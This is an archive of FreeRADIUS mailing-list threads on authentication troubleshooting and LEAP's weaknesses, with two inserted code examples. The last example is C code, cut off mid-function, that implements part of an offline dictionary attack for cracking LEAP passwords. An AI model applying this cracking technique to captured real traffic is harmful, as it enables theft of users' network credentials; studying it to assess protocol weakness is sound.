And the hard part: update all of the modules to have disconnect send/receive sections. Most of it is fairly simple editing from the existing templates... increasing the size of data structures, etc.

Alan DeKok.
Re: MS-CHAP can't work
Bai [EMAIL PROTECTED] wrote:
> If I try to authenticate to FreeRadius with MS-CHAP, it is still hard to get working after trying for a long time.
>
>     rlm_mschap: No LM/NT password configured. Check authorization.
>     modcall[authenticate]: module mschap returns invalid
>     ...
>
> Who can comment on what's happening? Thank you very much!!!

You have to tell the server what password to use to authenticate the user.

Alan DeKok.
Re: Works but not working
Beast [EMAIL PROTECTED] wrote:
> What are the minimal reply attributes needed for MSCHAP to work?

Uh, no. looking for certain RADIUS attributes in the response, and you're not telling the server to send them.

> Sniffing radius packet might help?

Uh, no. Please read your VPN documentation to see what attributes it needs in order for it to allow users to access the net. Then, configure FreeRADIUS to send those attributes.

Alan DeKok.
Freeradius 1.0 + Cisco 2950 + PAM auth problem
Hi all,

I have Freeradius 1.0 running on Linux. Users file contains only Default Auth-Type = PAM, Clients file contains my whole subnet. I'd like to use it for 802.1x authentication with Cisco 2950 switch. Radius config is OK - radtest launched from a server, using Cisco switch's secret key works fine. But when I try to authorize the computer (MacOS X) using built-in 802.1x supplicant, I receive the following error:

    attribute user password is required for authentication.

It seems like the switch doesn't pass my user password towards radius server in authentication request...

Radius-related entries in switch config:

    aaa new-model
    aaa authentication dot1x default group radius
    radius-server host my.local.ip.address auth-port 1812 acct-port 1813
    radius-server retransmit 3
    radius-server key mytestingkey

Any ideas how to make it work? MacOS X supplicant offers different authentication protocols, like: TTLS, TLS, LEAP, PEAP, MD5. Does it have something in common with my problem?

Thanks in advance for your help.

Best regards
Bartek Boczkaja
Re: 1.0.0. Problems with check-radiusd-config and rlm_perl
[EMAIL PROTECTED] wrote:
> 1. check-radiusd-config doesn't work with 1.0.0. because -p option is deprecated. why? IMHO, check-radiusd-config is useful, when one needs to check a new config while the working instance is running. So option -p has to be (IMHO).

The intent is to move to a better way of checking the configuration. i.e. like having the server re-load its configuration files into a temporary structure, and then revert to the existing configuration if there's a problem reading the new one.

> 2. There is memory leak in rlm_perl.c again. I had memory leak before Jul,12. After installing rlm_perl from snapshot leak leaves me.

Hmm OK.

Alan DeKok.
Re: short password field from lucent stingers
ariq Rashid [EMAIL PROTECTED] wrote:
> hi - we're seeing a Lucent Stinger device sending radius requests with a password field that is less than the 16 octets as per protocol.

Welcome to vendor implementations...

> now, some radius servers seem not to like this - but freeradius seems to work fine with this. i suspect that is because freeradius either ignores the length of that field, or copies it to a zero-padded buffer.

It uses the length of the password. See src/lib/radius.c, rad_pwdecode(). It explicitly checks if the password is smaller than 16 characters, and has a few lines of code to ensure that those passwords work. The code was added to deal with NASes like the Lucent one.

> am i right? see section of an email below for details... is this evidence that the problem lucent stinger is malforming its packets?

Yes.

> or are there valid cases when the Password field is short?

No.

Alan DeKok.
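Alan's description of rad_pwdecode() coping with a User-Password field shorter than 16 octets, as an added Python example that is not FreeRADIUS's own code: the RFC 2865 section 5.2 hiding scheme, a decoder that uses the field's real length as the thread describes (XORing only the octets actually present), and a length check a server can log to spot a NAS that malforms the attribute. The shared secret, Request Authenticator and passwords are constructed sample values.

```python
"""RFC 2865 User-Password hiding, tolerant of short (<16 octet) fields."""
import hashlib
import os


def pwencode(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Hide a password as a compliant NAS does (RFC 2865 5.2): pad with NULs to
    a multiple of 16, then c_i = p_i XOR MD5(secret + c_{i-1}), c_0 = Request
    Authenticator."""
    if not 1 <= len(password) <= 128:
        raise ValueError("password must be 1..128 octets")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = bytearray(), authenticator
    for off in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[off:off + 16], key))
        out += block
        prev = block                        # chaining uses the ciphertext block
    return bytes(out)


def is_rfc_length(field: bytes) -> bool:
    """True only for what RFC 2865 allows: 16..128 octets, a multiple of 16.
    A False here is worth logging: it fingerprints a NAS like the Stinger."""
    return 16 <= len(field) <= 128 and len(field) % 16 == 0


def pwdecode(field: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Recover the password. As the thread says of rad_pwdecode(), the field's
    actual length drives the loop instead of an assumed 16-octet block, so a
    NAS that sends only as many octets as the password has still decodes."""
    if not 1 <= len(field) <= 128:
        raise ValueError("User-Password field must be 1..128 octets")
    out, prev = bytearray(), authenticator
    for off in range(0, len(field), 16):
        block = field[off:off + 16]         # may be shorter than 16 at the end
        key = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(block, key))   # zip stops at the short block
        prev = block
    return bytes(out).rstrip(b"\x00")       # strip the RFC NUL padding


if __name__ == "__main__":
    secret, auth, pw = b"mytestingkey", os.urandom(16), b"hunter2!"
    full = pwencode(pw, secret, auth)       # what a compliant NAS sends (16 octets)
    short = full[:len(pw)]                  # constructed Stinger-style field (8 octets)
    print(is_rfc_length(short), pwdecode(full, secret, auth), pwdecode(short, secret, auth))
```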
Re: Freeradius 1.0 + Cisco 2950 + PAM auth problem
Bartek Boczkaja [EMAIL PROTECTED] wrote:
> I have Freeradius 1.0 running on Linux. Users file contains only Default Auth-Type = PAM, Clients file contains my whole subnet. I'd like to use it for 802.1x authentication with Cisco 2950 switch.

It's impossible. PAM needs a clear-text password for authentication, and no such clear-text password exists in EAP.

> Any ideas how to make it work? MacOS X supplicant offers different authentication protocols, like: TTLS, TLS, LEAP, PEAP, MD5. Does it have something in common with my problem?

Give the server a clear-text password, and it can use that to authenticate the EAP requests. And no, you can't use PAM to get clear-text passwords.

Alan DeKok.
Re: Accounting issue
On Tue, Aug 31, 2004 at 04:01:17PM +0200, Bastien wrote:
> Hunt groups are defined in huntgroups file like:
>
>     huntgroups
>     COM21 NAS-IP-Address = 192.168.1.1 Cisco-Gateway-Id = COM21
>     COM22 NAS-IP-Address = 192.168.2.1 NAS-IP-Address = 192.168.2.2
>     /huntgroups
>
> The Huntgroup-Name attribute will be appended automatically.

That's all clear for me, the only thing I want to do now is add the Huntgroup-Name variable into the detailfile. example:

    detailfile = ${radacctdir}//detail-${Huntgroup-Name}

I tried to do this but it just ignores it. I tried using an % instead of an $, but then the server won't even start.

greets,
Erik

> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Erik Immers
> Sent: Tuesday 31 August 2004 10:34
> To: [EMAIL PROTECTED]
> Subject: Re: Accounting issue
>
> On Mon, Aug 30, 2004 at 10:36:56AM -0400, Alan DeKok wrote:
> > Erik Immers [EMAIL PROTECTED] wrote:
> > > Is there within freeradius (0.8.1) the possibility to log to 2 detail files depending on the NAS.
> >
> > You should upgrade to 1.0.0. And the detail file is configurable. See the comments in radiusd.conf.
>
> The comments indeed speak of a configurable detail file. But what we want to achieve is that one half of the NASes log to 1 detail file, and the other half to another detail file. As far as I see it is only possible to either put everything in 1 detail file, or every NAS in its own detail file. The only option I can think of is to do something with the huntgroup name, but I don't see any option to put that into the detail section of radiusd. Might it be possible to create a variable in the users file to use that in the radiusd.conf, or something that will give me the same result.
>
> Example: add the variable HUNTGROUP-NAME to the users file, and add it to the detail section in the radiusd.conf
>
>     users file
>     steve   Auth-Type := Local, User-Password == testing
>             Service-Type = Framed-User,
>             Framed-Protocol = PPP,
>             Framed-IP-Address = 172.16.3.33,
>             Framed-IP-Netmask = 255.255.255.0,
>             Framed-Routing = Broadcast-Listen,
>             Framed-Filter-Id = std.ppp,
>             Framed-MTU = 1500,
>             Framed-Compression = Van-Jacobsen-TCP-IP,
>             HUNTGROUP-NAME = com21
>     /users file
>
>     radiusd.conf
>     detailfile = ${radacctdir}//detail-${HUNTGROUP-NAME}
>     /radiusd.conf
>
> Sorry if my explanation isn't all that clear.
>
> Erik Immers
>
> > Alan DeKok.
mysql module problem
Hi, I'm new on the list and I want to share my problem with you. I'm trying to authenticate a user and I got this:

    rlm_sql (sql): Pairs do not match for user [110]
    rlm_sql (sql): Released sql socket id: 10
    modcall[authorize]: module sql returns notfound
    modcall: group authorize returns ok
    auth: No authenticate method (Auth-Type) configuration found for the request: Rejecting the user
    auth: Failed to validate the user.
    Login incorrect: [] (from client x.x.x.x port 0)
    Sending Access-Reject of id 245 to x.x.x.x:1812

Please, I need help. Thanks in advance.
Re: Bug/security EAP-TLS
Sorry I haven't checked this yet. I'll be testing it today. We just got done with a major electrical repair on campus. They took down the power to the entire campus for about 36 hours, so we had to power down our entire infrastructure then bring it back up yesterday. Suffice it to say that this weekend has been a long one.

--Mike

On Tue, 2004-08-31 at 09:51, Alan DeKok wrote:
> Joey Nix [EMAIL PROTECTED] wrote:
> > So will it be:
> >
> >     case handshake:
> >         if (tls_session->info.handshake_type == finished) {
> >             DEBUG2("rlm_eap_tls: ack handshake is finished");
> >             return EAPTLS_SUCCESS;
> >         }
> >         DEBUG2("rlm_eap_tls: ack handshake fragment handler");
> >         /* Fragmentation handler, send next fragment */
> >         return EAPTLS_REQUEST;
>
> Yes.
>
> > or will it be:
> >
> >     case handshake:
> >         if (tls_session->info.handshake_type == finished) {
> >             DEBUG2("rlm_eap_tls: ack handshake is finished");
> >             return EAPTLS_SUCCESS;
> >         }
> >     default:
> >         DEBUG2("rlm_eap_tls: ack default");
> >         radlog(L_ERR, "rlm_eap_tls: Invalid ACK received: %d",
>
> No. That would make it impossible for multi-ack sessions to work, and would require that everything be sent in only one SSL packet.
>
> Alan DeKok.

--
--Mike
---
Michael Griego
Wireless LAN Project Manager
The University of Texas at Dallas
Re: Ntlm problem with peap
Hi again,

On Tue, 2004-08-31 at 15:49, Alan DeKok wrote:
> Nuno Miguel Pais Fernandes [EMAIL PROTECTED] wrote:
> > Running 1.0.0 on dual intel so little-endian. Apparently challenge or nt-response are being generated wrongly, or it's a bug in ntlm_auth.
>
> I've been running it on an x86 for a while, and I haven't seen any problems like that.

Do you suspect problems in xlat or in microsoft supplicant? Any ideas?

> > Is there any workaround to have peap with mschapv2 working without ntlm?
>
> Yes, supply a clear-text, or NT-Password.

I don't have clear text password but I do have NT-Password (unfortunately in ldap and not starting with 0x). Could it work?

Thanks for all the help..
Nuno Fernandes

> Alan DeKok.

--
Nuno Miguel Pais Fernandes [EMAIL PROTECTED]
Rejecting CallingStationId
Could I ban or reject a specific CallingStationID? The only examples I have seen are on a specific user or group of users, in the file /etc/users. Some nice friends on the list told me to try:

    DEFAULT Calling-Station-Id =~ "8183635958", Auth-Type := Reject

I tried it and it works. I tried also some things like

    DEFAULT Called-Station-Id == "4700", Auth-Type := Reject
    DEFAULT Calling-Station-Id == "8183635958", Called-Station-Id == "4700", Auth-Type := Reject

and I think it worked just fine. The question now is, could I have these Called and Calling station ids in a sql table, so my script for blocking/banning Called or Calling would be in a sql table and I would not have to restart radius each time I add a new rule in the users file?

Thanks
Armando Leal.
Re: Accounting issue
Erik Immers [EMAIL PROTECTED] wrote:
>     detailfile = ${radacctdir}//detail-${Huntgroup-Name}
>
> I tried to do this but it just ignores it. I tried using an % instead of an $, but then the server won't even start.

Try using 1.0.0, rather than 0.8.1. I don't even recall if that was configurable in 0.8.1.

Alan DeKok.
Re: Ntlm problem with peap
Nuno Miguel Pais Fernandes [EMAIL PROTECTED] wrote:
> > I've been running it on an x86 for a while, and I haven't seen any problems like that.
>
> Do you suspect problems in xlat or in microsoft supplicant?

I have no idea.

> I don't have clear text password but I do have NT-Password (unfortunately in ldap and not starting with 0x). Could it work?

It should. See src/modules/rlm_mschap/rlm_mschap.c

Alan DeKok.
Re[2]: 1.0.0. Problems with check-radiusd-config and rlm_perl
august, 31 2004 at 21:07:13 Alan wrote:
> > 1. check-radiusd-config doesn't work with 1.0.0. because -p option is deprecated. why? IMHO, check-radiusd-config is useful, when one needs to check a new config while the working instance is running. So option -p has to be (IMHO).
>
> The intent is to move to a better way of checking the configuration. i.e. like having the server re-load its configuration files into a temporary structure, and then revert to the existing configuration if there's a problem reading the new one.

rlm_perl has to reread scripts-file(s). what happens with perl's instance if there are errors in scripts? i think radiusd will crash. I always run perl -c radius.pl after editing radius.pl, But running radiusd via check-radiusd-config is more reliable.

Some time ago, when rlm_perl was very unstable, i preferred to restart radiusd. now i use rlm_perl from Jul,12 snapshot and it looks very stable. But i prefer to restart radiusd anyway.

Best Regards,
Mike
Assertion failed
Hello,

I was running 2 radius servers in a production environment, running FreeRadius 0.9.3 with SNMP support. Each radius using the same M$ SQL server as a backend via FreeTDS/UnixODBC. Occasionally I saw these errors in radius.log

    Error: Assertion failed in modcall.c, line 68
    Error: Assertion failed in radiusd.c, line 2619

1. I hope this is not too broad a question, but generally what causes these errors?
2. When the errors occur, would it cause radius to stop responding momentarily, cause a crash, or any adverse effects?

I have since upgraded both servers to version 1.0.0 and have not seen the errors. However I am trying to do a post mortem on another application that uses our FreeRADIUS and I want to rule out our radius as a possible cause.

Thanks,
Re: How does one compile pam-radius auth???
Well, maybe because I missed something or don't know what I am doing. I found the pam_radius related software on this page:

    http://www.freeradius.org/related/

Which is exactly what I need, so I downloaded the software and tried to get it to compile. It wouldn't so I tried dropping it into the free radius src tree to see if I could get it to compile, which it wouldn't. The documentation for compiling the pam_radius stuff is a little minimal:

    make

Basically I am just trying to get it to compile so I can use it with an existing radius server.

Thanks,
Roger

On Tue, 31 Aug 2004 10:50:18 -0400, Alan DeKok [EMAIL PROTECTED] wrote:
> roger weiss [EMAIL PROTECTED] wrote:
> > I have copied the downloaded files to: src/pam-radius and I modified the Makefile in src to include the directory pam-radius.
>
> Why?
>
> > If I don't include the pam-radius in the overall build radius appears to build correctly.
>
> Why are you including pam-radius in the freeradius build? I don't understand what you're doing, or why you think it's necessary.
>
> Alan DeKok.
Re: Assertion failed
David [EMAIL PROTECTED] wrote:
>     Error: Assertion failed in modcall.c, line 68
>     Error: Assertion failed in radiusd.c, line 2619
>
> 1. I hope this is not too broad a question, but generally what causes these errors?

A code path is possible, but not handled. The assertion is there to say "we don't know how to handle this".

> 2. When the errors occur, would it cause radius to stop responding momentarily, cause a crash, or any adverse effects?

It would cause the server to die immediately.

> I have since upgraded both servers to version 1.0.0 and have not seen the errors.

1.0.0 has a number of these bugs fixed.

Alan DeKok.
Re: How does one compile pam-radius auth???
roger weiss [EMAIL PROTECTED] wrote:
> Which is exactly what I need, so I downloaded the software and tried to get it to compile. It wouldn't so I tried dropping it into the free radius src tree to see if I could get it to compile, which it wouldn't.

It's not intended to be part of FreeRADIUS.

> The documentation for compiling the pam_radius stuff is a little minimal:
>
>     make

See also the Makefile, which contains additional documentation.

Alan DeKok.
Radius with 2 clients (gateway and gatekeeper)
I am a new user of FreeRadius, I have the following problem:

In our network configuration we have a gateway and a gatekeeper. The gateway is already configured to send authentication and accounting info to radius, and radius saves the info in the postgresql database (in a table start-start packets and in a table stop-stop packets) and also writes a log file. Now I configured the gatekeeper to send only accounting info to free radius. Radius saves the info only in a log file, but not in the database. I think that the gatekeeper logs are different from the gateway logs.

Can somebody tell me how to configure the postgres.conf file so that radius also saves the gatekeeper logs but in different tables, or if I can use mysql for the gatekeeper logs (how to separate the gatekeeper's info and the gateway's info)? I would also appreciate it if somebody could tell me where to read some docs.

Thanks in advance.
Re: Is there some kind of trick to make Cisco LEAP work???
James,

We have gotten LEAP to work with Cisco access points. My last posting on the subject might help if you haven't gotten there yet...

    http://lists.freeradius.org/pipermail/freeradius-users/2004-August/035601.html

However, we have not been able to get LEAP for Cisco's WDS worked out. All of the access points in the group authenticate successfully, but the WLSE does not. I've looked carefully at the debug output on freeradius as well as the debug output on the master Access Point. Freeradius debug shows that most of the EAP transaction takes place normally. The initial Access-Request, the Identity challenge, the Access-Request response to that, and the new Access-Challenge from radiusd are all just fine. But... the supplicant (WLSE) does NOT answer that final Access-Challenge... at all. Freeradius debug shows no indication of error or mis-configuration.

Following this, I scrutinized the radius debug output on the master Access Point. In one test, the AP pointed to the freeradius server. In a second test, the AP pointed to a cisco ACS server (on another AP). Comparing the debug output from these two tests revealed only a small (but significant) difference. The ACS server and freeradius return nearly identical attributes. The first difference is that in the first Access-Challenge, ACS returns Session-Timeout integer of value 10. Freeradius does not return this attribute by default. I'll have it return that attribute in the next test. I doubt that is the problem, but you never know.

More significant is the value of State in each Access-Challenge. The ACS server sends a State with 48 octets of data, like this...

    3C CE 0B C2 1F C4 EC 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    4A 8B 02 C7 5F 73 30 72 79 4C BE 81 58 77 08 FC

Freeradius sends a State with 16 octets of data, like this...

    08 69 18 A9 AF 56 71 B1 2C E9 A9 2A 35 CA D9 94

The RFC on this attribute ( http://www.freeradius.org/rfc/rfc2865.html#State ) says the value is application specific, and I'm not sure which module produces it, how to decode it, etc. But it seems clear to me that this is the fly that choked the horse (Cisco's WLSE leap/eap/radius client being the horse). Can someone who understands the nuances of this State value please help?

    freeradius-1.0.0
    Red Hat Enterprise Linux AS release 3 (Taroon Update 2)
    openssl-0.9.7a-33.4.i686.rpm
    openldap-2.2.13 (on localhost)

Thanks,
Coates Carter
University of Richmond

...

> James D. Munroe [EMAIL PROTECTED] wrote:
> > Has anyone tried or successfully been able to get Cisco-Leap to work using FreeRadius?
>
> Lots of people. That's why the feature is there. It's been used for over a year now. If you can't get LEAP to work, I suggest running the server in debugging mode, and reading the FAQ about statements like "it doesn't work" on this list. LEAP works. If it doesn't work in your setup, debug mode will tell you why.
>
> Alan DeKok.

..

> James D. Munroe [EMAIL PROTECTED]
> Fri, 25 Jun 2004 17:32:22 -0300 (ADT)
>
> Hello,
>
> Has anyone tried or successfully been able to get Cisco-Leap to work using FreeRadius?
>
> Components:
> - Cisco AIR-AP1230B-A-K9 Access Points running IOS 12.2.15
> - Freeradius 0.9.3 installed from the Redhat ES 3.0 RPM, running on a Redhat ES 3.0 Server
>
> If so, would it be possible to get sanitized copies of your Freeradius configuration files (radiusd.conf, users, clients.conf, etc...)? Authentication to the AP itself using radius works perfectly, have even setup EAP-TLS and it works perfectly!! But leap is no good... It's not a configuration issue on the Access Points themselves. Leap works fine when used against Cisco ACS (v3.2.3). However, for security reasons and cost of course we would like to use Freeradius for outside hosts rather than expose our internal ACS server.
>
> Also, I have been unable to get the WDS service working between the AP's and Cisco's WLSE. I'm not surprised since it uses Leap. It does work though with CiscoACS...but Freeradius is a no go. :-(
>
> Any help would be greatly appreciated!!
>
> Thanks,
> Jim
[OT] Should anyone even use LEAP
Coates Carter wrote:
> James,
>
> We have gotten LEAP to work with Cisco access points. My last posting on the subject might help if you haven't gotten there yet...

I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/

Should LEAP be used in any production environment to ensure security on wireless links?

If this is inappropriate to ask, my apologies.

-Adam
Re: How does one compile pam-radius auth???
Maybe you can give a little more information as to what I need to do to compile pam-radius?

If I copy it to its own subdirectory and try to compile it standalone I get:

    [EMAIL PROTECTED] pam-radius]# make
    cc -Wall -fPIC -c pam_radius_auth.c -o pam_radius_auth.o
    In file included from pam_radius_auth.c:63:
    pam_radius_auth.h:22:20: radius.h: No such file or directory
    In file included from pam_radius_auth.h:23,
                     from pam_radius_auth.c:63:
    /usr/include/md5.h:27: error: syntax error before UINT4

If I modify CFLAGS in Makefile to -I /path/to/freeradius/includes and run make I get:

    [EMAIL PROTECTED] pam-radius]# make
    cc -Wall -fPIC -I /root/freeradius-1.0.0/src/include -c pam_radius_auth.c -o pam_radius_auth.o
    pam_radius_auth.c:163: error: syntax error before ipstr2long
    pam_radius_auth.c:163: warning: return type defaults to `int'
    pam_radius_auth.c: In function `ipstr2long':
    pam_radius_auth.c:168: error: `UINT4' undeclared (first use in this function)

I can tell my environment is messed up, I just don't know what I need to do to fix it.

Thanks,
Roger

On Tue, 31 Aug 2004 15:35:55 -0400, Alan DeKok [EMAIL PROTECTED] wrote:
> roger weiss [EMAIL PROTECTED] wrote:
> > Which is exactly what I need, so I downloaded the software and tried to get it to compile. It wouldn't so I tried dropping it into the free radius src tree to see if I could get it to compile, which it wouldn't.
>
> It's not intended to be part of FreeRADIUS.
>
> > The documentation for compiling the pam_radius stuff is a little minimal:
> >
> >     make
>
> See also the Makefile, which contains additional documentation.
>
> Alan DeKok.
Re: How does one compile pam-radius auth???
FYI - I am on Fedora Core 2

Thanks,
Roger

On Tue, 31 Aug 2004 15:35:55 -0400, Alan DeKok [EMAIL PROTECTED] wrote:
> roger weiss [EMAIL PROTECTED] wrote:
> > Which is exactly what I need, so I downloaded the software and tried to get it to compile. It wouldn't so I tried dropping it into the free radius src tree to see if I could get it to compile, which it wouldn't.
>
> It's not intended to be part of FreeRADIUS.
>
> > The documentation for compiling the pam_radius stuff is a little minimal:
> >
> >     make
>
> See also the Makefile, which contains additional documentation.
>
> Alan DeKok.
Re: Is there some kind of trick to make Cisco LEAP work???
Coates Carter [EMAIL PROTECTED] wrote:
> The ACS server and freeradius return nearly identical attributes. The first difference is that in the first Access-Challenge, ACS returns Session-Timeout integer of value 10. Freeradius does not return this attribute by default. I'll have it return that attribute in the next test. I doubt that is the problem, but you never know.

I'm not sure what else it would be.

> More significant is the value of State in each Access-Challenge. The ACS server sends a State with 48 octets of data, like this...
>
>     3C CE 0B C2 1F C4 EC 00 00 00 00 00 00 00 00 00
>     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>     4A 8B 02 C7 5F 73 30 72 79 4C BE 81 58 77 08 FC
>
> Freeradius sends a State with 16 octets of data, like this...
>
>     08 69 18 A9 AF 56 71 B1 2C E9 A9 2A 35 CA D9 94

That shouldn't matter. The State attribute is defined to be opaque nonsense, so far as the NAS is concerned.

> The RFC on this attribute ( http://www.freeradius.org/rfc/rfc2865.html#State ) says the value is application specific, and I'm not sure which module produces it, how to decode it, etc. But it seems clear to me that this is the fly that choked the horse (Cisco's WLSE leap/eap/radius client being the horse).

The state is meaningless, other than a series of bytes which the server interprets. It's implementation-specific, and the NAS thinks it means anything.

Alan DeKok.
Re: [OT] Should anyone even use LEAP
Adam Shelley [EMAIL PROTECTED] wrote:
> I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/
>
> Should LEAP be used in any production environment to ensure security on wireless links?

It's no more vulnerable than MS-CHAP, except that MS-CHAP isn't used in wireless sessions. EAP-TTLS or EAP-PEAP are preferred for wireless.

Alan DeKok.
Re: How does one compile pam-radius auth???
roger weiss [EMAIL PROTECTED] wrote:
> Maybe you can give a little more information as to what I need to do to compile pam-radius? If I copy it to its own subdirectory and try to compile it standalone I get:
>
>     [EMAIL PROTECTED] pam-radius]# make
>     cc -Wall -fPIC -c pam_radius_auth.c -o pam_radius_auth.o
>     In file included from pam_radius_auth.c:63:
>     pam_radius_auth.h:22:20: radius.h: No such file or directory

Weird. There's a radius.h inside that directory, and the compiler should be picking it up.

> If I modify CFLAGS in Makefile to -I /path/to/freeradius/includes and run make I get:

Why not:

    cc -Wall -fPIC -I. -c pam_radius_auth.c -o pam_radius_auth.o

Alan DeKok.
RE: [OT] Should anyone even use LEAP
Yes

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alan DeKok
Sent: Tuesday, August 31, 2004 2:01 PM
To: [EMAIL PROTECTED]
Subject: Re: [OT] Should anyone even use LEAP

Adam Shelley [EMAIL PROTECTED] wrote:
> I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/
>
> Should LEAP be used in any production environment to ensure security on wireless links?

It's no more vulnerable than MS-CHAP, except that MS-CHAP isn't used in wireless sessions. EAP-TTLS or EAP-PEAP are preferred for wireless.

Alan DeKok.
RE: [OT] Should anyone even use LEAP
Hi Adam,

If any other alternative exists, then LEAP should not be used. As you've pointed out, LEAP is vulnerable to known published attacks. Even Cisco recommends (their version of ;-) PEAP. Given the requirements placed upon the AP, LEAP is also effectively constrained to Cisco APs.

For Microsoft devices, the most straightforward choice is PEAP/MS-CHAPv2. This is a less flexible choice than EAP-TTLS but doesn't require the purchase of any third party software. Some wireless cards now come with EAP-TTLS supplicants but by no means all of them. There are free (for personal use)/cheap (for commercial use) EAP-TTLS clients (e.g. SecureW2) but this does impose an extra administrative burden on the operator of the network. Some may not feel that the added flexibility of EAP-TTLS is worth the extra administration.

Anyway, to get back to your original question, there are almost no circumstances under which LEAP would be the appropriate choice in a production environment.

Regards,
Guy

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Adam Shelley
Sent: 31 August 2004 21:38
To: [EMAIL PROTECTED]
Subject: [OT] Should anyone even use LEAP

Coates Carter wrote:
> James,
>
> We have gotten LEAP to work with Cisco access points. My last posting on the subject might help if you haven't gotten there yet...

I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/

Should LEAP be used in any production environment to ensure security on wireless links?

If this is inappropriate to ask, my apologies.

-Adam
RE: [OT] Should anyone even use LEAP
ASLEAP uses an offline dictionary attack to crack LEAP passwords. Best practice to use when deploying LEAP is strong user passwords.

Amos

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alan DeKok
Sent: Tuesday, August 31, 2004 2:01 PM
To: [EMAIL PROTECTED]
Subject: Re: [OT] Should anyone even use LEAP

Adam Shelley [EMAIL PROTECTED] wrote:
> I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/
>
> Should LEAP be used in any production environment to ensure security on wireless links?

It's no more vulnerable than MS-CHAP, except that MS-CHAP isn't used in wireless sessions. EAP-TTLS or EAP-PEAP are preferred for wireless.

Alan DeKok.
RE: [OT] Should anyone even use LEAP
That places too great a reliance upon the user to maintain a strong password. The strength of the protection should be separated, as far as is technically possible, from the strength of the password. If more resilient mechanisms exist and are implemented just as trivially then it is foolish to use a weaker mechanism. Regards, Guy -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Amos Gregory Sent: 31 August 2004 21:58 To: [EMAIL PROTECTED] Subject: RE: [OT] Should anyone even use LEAP ASLEAP uses an offline dictionary attack to crack LEAP passwords. Best practice to use when deploying LEAP is strong user passwords. Amos -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alan DeKok Sent: Tuesday, August 31, 2004 2:01 PM To: [EMAIL PROTECTED] Subject: Re: [OT] Should anyone even use LEAP Adam Shelley [EMAIL PROTECTED] wrote: I was just wondering, would this type of setup still be vulnerable to this: http://asleap.sourceforge.net/ Should LEAP be used in any production environment to ensure security on wireless links? It's no more vulnerable than MS-CHAP, except that MS-CHAP isn't used in wireless sessions. EAP-TTLS or EAP-PEAP are preferred for wireless. Alan DEKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
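Added example, not from the thread above and not asleap's own code: why the "offline dictionary attack" Amos mentions is cheap against LEAP. LEAP uses the MS-CHAPv1 response, which zero-pads the 16-byte NT hash (MD4 of the UTF-16LE password) to 21 bytes and splits it into three DES keys; the third key is two hash bytes plus five zeros, so an attacker brute-forces 2^16 keys against the captured third response block to learn those two bytes, then keeps only the dictionary words whose NT hash ends in them. The code below implements MD4 (RFC 1320, because MD4 is missing from many current crypto libraries), the NT hash, and that tail filter; it assumes ASCII passwords, uses a constructed wordlist, and leaves out the DES step that would confirm the survivors against the full response.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static uint32_t rotl32(uint32_t x, int s) { return (x << s) | (x >> (32 - s)); }

/* MD4 as in RFC 1320; three rounds of 16 steps over 64-byte blocks. */
static void md4(const uint8_t *msg, size_t len, uint8_t out[16]) {
    static const int k2[16] = {0,4,8,12,1,5,9,13,2,6,10,14,3,7,11,15};
    static const int k3[16] = {0,8,4,12,2,10,6,14,1,9,5,13,3,11,7,15};
    static const int s1[4] = {3,7,11,19}, s2[4] = {3,5,9,13}, s3[4] = {3,9,11,15};
    uint32_t h[4] = {0x67452301u, 0xefcdab89u, 0x98badcfeu, 0x10325476u};
    uint64_t bits = (uint64_t)len * 8;
    size_t padded = ((len + 8) / 64 + 1) * 64, off, i;
    for (off = 0; off < padded; off += 64) {
        uint32_t X[16], a = h[0], b = h[1], c = h[2], d = h[3], t;
        uint8_t blk[64];
        for (i = 0; i < 64; i++) {          /* message, 0x80, zero pad, 64-bit LE bit length */
            size_t p = off + i;
            if (p < len) blk[i] = msg[p];
            else if (p == len) blk[i] = 0x80;
            else if (p >= padded - 8) blk[i] = (uint8_t)(bits >> (8 * (p - (padded - 8))));
            else blk[i] = 0;
        }
        for (i = 0; i < 16; i++)
            X[i] = (uint32_t)blk[4*i] | (uint32_t)blk[4*i+1] << 8 |
                   (uint32_t)blk[4*i+2] << 16 | (uint32_t)blk[4*i+3] << 24;
        for (i = 0; i < 16; i++) {          /* round 1, F = (x&y)|(~x&z) */
            t = rotl32(a + ((b & c) | (~b & d)) + X[i], s1[i % 4]);
            a = d; d = c; c = b; b = t;
        }
        for (i = 0; i < 16; i++) {          /* round 2, G = majority */
            t = rotl32(a + ((b & c) | (b & d) | (c & d)) + X[k2[i]] + 0x5a827999u, s2[i % 4]);
            a = d; d = c; c = b; b = t;
        }
        for (i = 0; i < 16; i++) {          /* round 3, H = xor */
            t = rotl32(a + (b ^ c ^ d) + X[k3[i]] + 0x6ed9eba1u, s3[i % 4]);
            a = d; d = c; c = b; b = t;
        }
        h[0] += a; h[1] += b; h[2] += c; h[3] += d;
    }
    for (i = 0; i < 4; i++) {               /* little-endian digest */
        out[4*i] = (uint8_t)h[i];           out[4*i+1] = (uint8_t)(h[i] >> 8);
        out[4*i+2] = (uint8_t)(h[i] >> 16); out[4*i+3] = (uint8_t)(h[i] >> 24);
    }
}

/* NT hash = MD4(UTF-16LE(password)); ASCII-only conversion is an assumption here. */
void nt_hash(const char *password, uint8_t out[16]) {
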